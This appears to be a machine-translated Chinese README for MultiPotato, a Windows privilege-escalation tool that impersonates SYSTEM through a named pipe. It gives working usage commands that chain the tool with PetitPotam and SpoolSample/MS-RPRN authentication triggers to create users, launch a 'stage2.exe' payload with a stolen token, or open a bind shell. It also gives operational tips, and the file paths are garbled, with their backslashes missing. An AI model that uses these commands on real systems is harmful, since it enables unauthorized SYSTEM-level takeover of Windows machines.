MultiPotato
- 它不包含任何用于武器化的系统身份验证触发器。相反,该代码可用于自行集成您最喜欢的触发器。
- 它不仅
CreateProcessWithTokenW用于生成新进程。相反,你可以选择CreateProcessWithTokenW,CreateProcessAsUserW,CreateUser和BindShell。
因此,该项目能够打开 NamedPipe 服务器,模拟连接到它的任何用户,然后执行上述选项之一。如果将来发布任何新的 SYSTEM auth 触发器,此工具仍可用于提升权限 - 在这种情况下,您只需要使用另一个 Pipe-Name。
例子:
- 带有修改过的 PetitPotam 触发器的 CreateUser:
c:tempMultiPotato> MultiPotato.exe -t CreateUser默认情况下,您有 60 秒的值(可通过THEAD_TIMEOUT 更改)以让 SYSTEM 帐户或任何其他帐户进行身份验证。例如,这可以通过未修补的 MS-EFSRPC 函数来完成。默认情况下,MultiPotato 侦听管道名称\.pipepwned/pipe/srvsvc,该名称旨在与 MS-EFSRPC 结合使用。对于其他 SYSTEM auth 触发器,您可以通过-p参数调整此值。
c:tempMultiPotato> PetitPotamModified.exe localhost/pipe/pwned localhost使用PetitPotam.py有效的低特权用户作为远程系统的触发器当然也是可能的。
- CreateProcessAsUserW 与 SpoolSample 触发器:
c:tempMultiPotato> MultiPotato.exe -t CreateProcessAsUserW -p "pwnedpipespoolss" -e "C:tempstage2.exe"并通过触发它
代码语言:javascript复制c:tempMultiPotato>MS-RPRN.exe \192.168.100.150 \192.168.100.150/pipe/pwned
重要提示:在我对 MS-RPRN 的测试中,我不能使用 localhost 或 127.0.0.1 作为目标,这必须是网络 IP 地址或 FQDN。此外,需要启用打印机服务才能使其工作。
- BindShell 与 SpoolSample PipeName
c:tempMultiPotato> MultiPotato.exe -t BindShell -p "pwnedpipespoolss"
